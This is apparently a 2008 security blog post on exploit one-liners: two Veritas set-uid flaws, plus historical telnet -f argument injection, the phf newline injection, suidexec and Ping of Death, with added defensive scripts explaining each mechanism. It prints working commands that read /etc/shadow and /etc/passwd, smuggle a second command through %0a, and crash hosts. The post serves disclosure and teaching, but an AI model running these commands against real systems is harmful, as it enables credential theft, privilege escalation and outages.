Exploit One-Liners

Very Small Shell Scripts

Every once in a while there are security vulnerabilities publicized that can be exploited with a single command. This week, Security Objectives published advisories for two such vulnerabilities (SECOBJADV-2008-04 and SECOBJADV-2008-05) which I’ll be describing here. I’ll also be revisiting some one-line exploits from security’s past for nostalgia’s sake and because history tends to repeat itself.

Both issues are in Symantec's Veritas Storage Foundation Suite, and both rely on the set-uid root bits that ship by default on the affected binaries. Before Symantec and Veritas combined, the Sun package installer prompted the administrator with the option of removing the set-id bits. The new Symantec installer just goes ahead and sets the bits without asking (how rude!).
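The check a practitioner wants after reading that is an inventory of what is actually set-id under the product's install tree, and a way to undo it. The script below is an added example, not Symantec's or Security Objectives' code: it builds a throwaway directory with constructed stand-in files (the names are made up, not the real binaries), lists everything carrying the set-uid or set-gid bit, and strips the bits. On a real box you would point list_setid at /opt/VRTS and /opt/VRTSvxfs instead of the fixture.

```shell
#!/bin/bash
# Added example: inventory and strip set-uid/set-gid bits under a tree.
# The directory and file names in make_fixture are constructed stand-ins.

# Print every regular file under $1 that has the set-uid or set-gid bit.
list_setid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print | sort
}

# Number of such files (handy for a before/after comparison).
count_setid() {
    list_setid "$1" | wc -l | tr -d ' '
}

# Remove the set-uid and set-gid bits from everything list_setid reports.
# This is what the old Sun installer offered to do at package-add time.
strip_setid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -exec chmod u-s,g-s {} +
}

# Build a throwaway tree that mimics an install with the bits set.
make_fixture() {
    local dir
    dir=$(mktemp -d)
    mkdir -p "$dir/bin" "$dir/sbin"
    : > "$dir/bin/mkfile-stub";  chmod 4755 "$dir/bin/mkfile-stub"   # set-uid
    : > "$dir/sbin/admin-stub";  chmod 2755 "$dir/sbin/admin-stub"   # set-gid
    : > "$dir/bin/harmless";     chmod 0755 "$dir/bin/harmless"      # neither
    printf '%s\n' "$dir"
}

# Demo run: two hits before stripping, none after.
fixture=$(make_fixture)
echo "before: $(count_setid "$fixture") set-id files"
list_setid "$fixture"
strip_setid "$fixture"
echo "after:  $(count_setid "$fixture") set-id files"
rm -rf "$fixture"
```

Note that find's -perm -4000 / -perm -2000 form is the portable one; GNU find's -perm /6000 does the same in one test but is not available everywhere.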

On to the good stuff. The first weakness is an uninitialized data disclosure: the file system blocks qiomkfile preallocates for the new file are handed out without being zeroed. It can be leveraged like so:

/opt/VRTS/bin/qiomkfile -s 65536 -h 4096 foo

Now the hidden file .foo (note that it is a dot-file; foo itself is only a link to it) contains whatever was previously stored in those blocks, usually data left behind by other users' file system operations. Sensitive information can be harvested by varying the values passed to the -s (size) and -h (header size) flags over a period of time.

This next one is more critical in terms of privilege escalation and is somewhat similar to the Solaris srsexec hole from last year. Basically, you can pass any file's pathname on the command line and qioadmin, running set-uid root, will display its contents on stderr. In the shell command below, standard error is redirected back to standard output so the output can be read or piped along:

/opt/VRTSvxfs/sbin/qioadmin -p /etc/shadow / 2>&1

Some of these one-liners are more useful than exploits built around shellcode, and Kingcope's Solaris in.telnetd exploit is a beautiful example. The mechanism is argument injection: telnet's -l option carries the remote user name, in.telnetd handed that string straight to login(1) on its command line, and login reads -f as "this user is already authenticated, skip the password". The really interesting thing about that one was its resurrection: the same -f trick was well known back in 1994. In 2007, Kingcope's version won the Pwnie award for best server-side bug.

telnet -l -fusername hostname
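To make the argument injection concrete, here is an added example (mine, not Kingcope's exploit or Sun's code) that reduces the bug to a few lines of shell. login_stub is a stand-in for login(1) that only parses its arguments and reports whether it would have skipped the password; vulnerable_telnetd builds the command line the way the broken in.telnetd did, placing the client-supplied name where options are still being parsed, and fixed_telnetd shows one reasonable fix (an assumption for illustration, not the vendor's actual patch). Nothing here logs anyone in.

```shell
#!/bin/bash
# Added example: the argument injection behind "telnet -l -fusername host".
# login_stub stands in for login(1): it parses arguments and reports what
# the real program would have done. Nothing is authenticated or executed.

login_stub() {
    local OPTIND=1 opt preauth=0 user=""
    while getopts "f:ph:" opt; do
        case "$opt" in
            f) preauth=1; user=$OPTARG ;;   # -f name: caller vouches for name
            p|h) ;;                         # -p / -h host: accepted, irrelevant here
            *) echo "bad-option"; return 2 ;;
        esac
    done
    shift $((OPTIND - 1))
    [ -n "${1-}" ] && user=$1               # positional user name, if any
    if [ "$preauth" -eq 1 ]; then
        echo "preauth:$user"                # no password would be asked for
    else
        echo "password:$user"
    fi
}

# How the vulnerable in.telnetd assembled login's command line: the value
# telnet sent for -l (here $1) lands where login is still parsing options,
# so "-froot" is read as "-f root". $2 is the client host passed via -h.
vulnerable_telnetd() {
    login_stub -p -h "$2" "$1"
}

# One fix (illustrative, not the historical patch): refuse anything that
# cannot be an account name, and end option parsing with "--" before it.
fixed_telnetd() {
    case "$1" in
        ''|-*|*[!A-Za-z0-9._-]*) echo "rejected"; return 1 ;;
    esac
    login_stub -p -h "$2" -- "$1"
}

echo "vulnerable, alice:  $(vulnerable_telnetd alice  client.example)"
echo "vulnerable, -froot: $(vulnerable_telnetd -froot client.example)"
echo "fixed, alice:       $(fixed_telnetd      alice  client.example)"
echo "fixed, -froot:      $(fixed_telnetd      -froot client.example)"
```

The "--" alone would already stop "-froot" from being parsed as an option, but it is the allowlist check that turns a quiet misparse into a rejected login attempt you can alert on.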

Let's not forget other timeless classics, such as the cgi-bin/phf bug, also from the mid-nineties. phf backslash-escaped the usual shell metacharacters before handing the query to a shell, but newline was not on its list, so a %0a ends the ph command and starts one of your own:

lynx http://host.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
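The shape of that bug is worth seeing without a 1996 web server. The script below is an added example and not the CGI's source: flawed_escape is a stand-in for the escape routine, using the metacharacter list usually cited for it (newline absent, as in the original), urldecode is the standard bash idiom for %XX decoding, and phf_command assembles the string that would have reached popen(3) without running it. The /usr/local/bin/ph path and the -m alias= form are the ones commonly quoted for the original CGI; treat them as illustrative. validate_alias is my suggested allowlist, not the historical fix.

```shell
#!/bin/bash
# Added example: the phf bug reduced to its essentials. Nothing is executed;
# the functions only build and inspect the command string.

# Decode + and %XX from a query-string value (bash idiom; assumes the
# input carries no raw backslashes of its own).
urldecode() {
    local s=${1//+/ }
    printf '%b' "${s//%/\\x}"
}

# Stand-in for the CGI's escape routine: backslash-escape shell
# metacharacters. Newline is deliberately not in the list, as it was not
# in the original, which is the whole bug.
flawed_escape() {
    local s=$1 out="" i c
    for ((i = 0; i < ${#s}; i++)); do
        c=${s:i:1}
        case "$c" in
            '&'|';'|'`'|"'"|'"'|'|'|'*'|'?'|'~'|'<'|'>'|'^'|'('|')'|'['|']'|'{'|'}'|'$'|'\')
                out+="\\$c" ;;
            *)  out+=$c ;;      # newline falls through untouched
        esac
    done
    printf '%s' "$out"
}

# The command line phf would have handed to popen(3) for a Qalias value
# (path and flags illustrative; see the lead-in).
phf_command() {
    printf '/usr/local/bin/ph -m alias=%s\n' "$(flawed_escape "$(urldecode "$1")")"
}

# How many shell command lines that string contains: 1 when the escaping
# held, 2 when a %0a smuggled in a second command.
count_commands() {
    phf_command "$1" | wc -l | tr -d ' '
}

# The durable fix is an allowlist of what an alias may contain, not a
# blocklist of what it may not.
validate_alias() {
    case "$1" in
        ''|*[!A-Za-z0-9._@-]*) return 1 ;;
    esac
    return 0
}

for q in 'jdoe' 'x;/bin/cat%20/etc/passwd' 'x%0a/bin/cat%20/etc/passwd'; do
    printf '%-30s -> %s command line(s)\n' "$q" "$(count_commands "$q")"
done
```

The semicolon variant stays a single command because the escape catches it; the newline variant becomes two, which is exactly the difference between the advisory-era one-liner and a harmless query.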

...and Debian's suidexec hole from the late nineties:

/usr/bin/suidexec /bin/sh /path/to/script

I'm not including exploits that have pipes, semicolons, backticks and the like in the command line, because that is really more than one command being executed. Since the "Ping of Death" is a single command from a commonly installed system utility, I'll include it here as well. I consider it a true denial of service attack since it does not rely on bandwidth exhaustion: one oversized ICMP echo request, fragmented on the wire and reassembled to more than the 65535-byte IP maximum, was enough to crash the receiving stack. (-s sets the payload size; current ping implementations refuse anything above 65507 bytes, and current stacks bounds-check reassembly.)

ping -s70000 -c1 host

EOF


Comments

  1. jhh said

    Not like we can have a security company make secure products, there just wouldn’t be sufficient irony there, now would there?

  10. Blanche said

    I often do not post in blogs; however, your blog pushed me to. Impressive job,
    beautiful. It's been so very much appreciated!

  11. Lola said

    I don't usually reply to posts; however, I will in this case. My God, I believed you were going to chip in with some decisive insight at the end there, not leave it with "we leave it to
    you to decide". Thank you so much, a wonderful job!
